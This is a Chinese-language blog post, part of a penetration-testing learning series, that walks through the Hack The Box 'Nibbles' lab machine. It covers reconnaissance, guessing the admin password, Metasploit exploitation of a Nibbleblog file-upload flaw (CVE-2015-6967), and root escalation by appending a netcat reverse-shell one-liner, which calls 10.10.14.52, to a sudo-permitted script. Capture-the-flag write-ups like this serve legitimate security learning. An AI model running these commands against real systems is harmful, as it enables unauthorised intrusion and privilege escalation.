iT邦幫忙

2024 iThome 鐵人賽

DAY 4
1
Security

腳本小子的滲透測試學習筆記系列 第 4

第4天:HTB基礎靶機攻防實戰:從偵查到取得root權限(續)

  • 分享至 

  • xImage
  •  

因為我們發現port 80上有個web server所以可以知道他有架設網站,所以第二題它直接問我們blog有甚麼相對路徑

進網頁看一下有沒有提示,果然簡單的機器會給

https://ithelp.ithome.com.tw/upload/images/20240914/20153734JP9lQZSaWo.png

進來看看順便看第三題要甚麼

https://ithelp.ithome.com.tw/upload/images/20240914/20153734SsjTrafsEx.png

https://ithelp.ithome.com.tw/upload/images/20240914/201537346HStTAZtbd.png

Nibbleblog

找找看第4題要的XML檔

https://ithelp.ithome.com.tw/upload/images/20240914/20153734d1X12XS39e.png

https://ithelp.ithome.com.tw/upload/images/20240914/20153734fY64DN3ZOo.png

以為是feed結果不是

叫出F12重整網頁發現了有趣的位址

https://ithelp.ithome.com.tw/upload/images/20240914/201537347q8Z68s2pX.png

Bingo,看來這台機器沒有檔路徑

https://ithelp.ithome.com.tw/upload/images/20240914/20153734ey2MipL3mS.png

一番尋找下發現是users.xml這個位置存有帳號admin

第五題就是典型要考你通靈

https://ithelp.ithome.com.tw/upload/images/20240914/20153734I0F9B53mge.png

看到字數猜是機器名字

https://ithelp.ithome.com.tw/upload/images/20240914/20153734F7SPOYFhad.png

第六題就比較麻煩,看Hint說是要暴破

那就下一回gobuster,字典就挑seclists裡面最經典的,可以看到一些比較有趣的目錄,連admin都有

https://ithelp.ithome.com.tw/upload/images/20240914/20153734SyDFjwqwAc.png
找看看README,答案就在上面

https://ithelp.ithome.com.tw/upload/images/20240914/20153734S3EVbCqQmr.png

第7題就比較簡單,CVE 關鍵字丟google

https://ithelp.ithome.com.tw/upload/images/20240914/20153734mERqSBxFDz.png

https://ithelp.ithome.com.tw/upload/images/20240914/20153734bvxFS8pRP5.png

以下兩題我們連著看

https://ithelp.ithome.com.tw/upload/images/20240914/20153734Bdl6tWVlNP.png

我們先到剛才找到的admin.php的登入點,把帳號admin密碼nibbles打進去

https://ithelp.ithome.com.tw/upload/images/20240914/20153734jKNEocT7X9.png

然後我們可以看到有好幾個連結可以按,逛一逛發現有上傳點,我們可以透過剛才的CVE 2015-6967得知nibbleblog有一個 File Upload漏洞,上傳shell可以讓我們取得對機器的操控權

https://ithelp.ithome.com.tw/upload/images/20240914/20153734lxPRZTtImL.png

這時候打開Metasploit 找看看有沒有可利用的,發現有一個,然後把條件設定好如我的圖示

https://ithelp.ithome.com.tw/upload/images/20240914/20153734UgZdxNV4ge.png

https://ithelp.ithome.com.tw/upload/images/20240914/20153734t3q01gcFyM.png

https://ithelp.ithome.com.tw/upload/images/20240914/20153734Q3WyDESBQa.png

能進meterpreter之後進shell 下whoami

https://ithelp.ithome.com.tw/upload/images/20240914/20153734H4G2ynKfnY.png

nibbler

相當於我們已經打入這台機器裡面

cd /home/nibbler底下並cat user.txt就可以拿到flag了

https://ithelp.ithome.com.tw/upload/images/20240914/20153734X1VBTVvvdJ.png

現在我們要做的還有取得這台機器的root權限也就是管理員權限來拿到另一個flag

先下sudo -l得到這台機器上有甚麼可以NOPASSWD執行文件的

https://ithelp.ithome.com.tw/upload/images/20240914/20153734SPvWPOmM4d.png

發現是monitor.sh

/home/nibbler/personal/stuff/monitor.sh

將以下網路上找到的reverse shell 放入文件後面

逐步解析:

  1. rm /tmp/f
    • 刪除臨時文件或命名管道 /tmp/f,以確保後續步驟能夠正常創建新的命名管道。
  2. mkfifo /tmp/f
    • 創建一個命名管道(FIFO),路徑為 /tmp/f。命名管道是一種特殊的文件,用於進程間的通信。
  3. cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.52 8443 > /tmp/f
    • cat /tmp/f:讀取命名管道 /tmp/f 的內容。這將會阻塞,直到有數據被寫入管道。
    • | /bin/sh -i:將從命名管道讀取的數據作為Shell的輸入,啟動一個互動式的Shell session。
    • 2>&1:將標準錯誤(stderr)重定向到標準輸出(stdout),確保所有輸出都被捕獲。
    • | nc 10.10.14.52 8443:使用 netcat 將Shell的輸出發送到遠端主機 10.10.14.52 的端口 8443
    • > /tmp/f:將從 netcat 接收到的數據寫入命名管道 /tmp/f,這實際上是將遠端主機發送的命令傳遞給本地的Shell。
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.52 8443 >/tmp/f' | tee -a monitor.sh

觸發

sudo /home/nibbler/personal/stuff/monitor.sh

記得開一個terminal 用netcat 監聽

nc -lvnp 8443

https://ithelp.ithome.com.tw/upload/images/20240914/20153734DbqVdmngmW.png

https://ithelp.ithome.com.tw/upload/images/20240914/20153734ezuyGRiKlL.png

呼~這樣就解決了一台機器,由於我之前已經打過這台機器,所以操作起來都大概知道怎麼做的了

那時候不是用metasploit打入的,而是用上傳reverse php的方式來進入機器,這台機器已經很久了所以解法應該大同小異。

下期我打算照著CEH的章節來講並做個筆記


上一篇
第3天:HTB基礎靶機攻防實戰:從偵查到取得root權限
下一篇
第5天: CEH第一章道德駭客概述
系列文
腳本小子的滲透測試學習筆記16
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言